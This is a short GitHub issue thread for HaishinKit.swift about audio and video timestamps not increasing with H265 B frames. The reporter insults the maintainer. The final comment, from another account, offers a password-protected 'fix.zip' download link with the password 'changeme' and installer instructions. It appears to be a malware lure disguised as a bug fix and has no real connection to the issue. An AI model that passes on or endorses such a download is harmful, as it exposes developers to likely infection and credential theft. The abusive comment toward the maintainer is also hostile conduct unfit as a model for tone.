### ISSUE TITLE
timestamp is not increase!

### ISSUE THREAD

**Issue by zhanganl** [shogo4405/HaishinKit.swift#1550]
### Describe the bug

![311D1136-5AC8-4031-E888-656ED62BF992](https://github.com/user-attachments/assets/5535d1fd-0300-4eef-a36b-0de437f71335)
timestamp is not increase!

### To Reproduce

H265
B frame

### Expected behavior

timestamp is increase, audio and video 

### Version

last

**Comment by zhanganl** [comment]
loser，Blind eyes！ @shogo4405

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
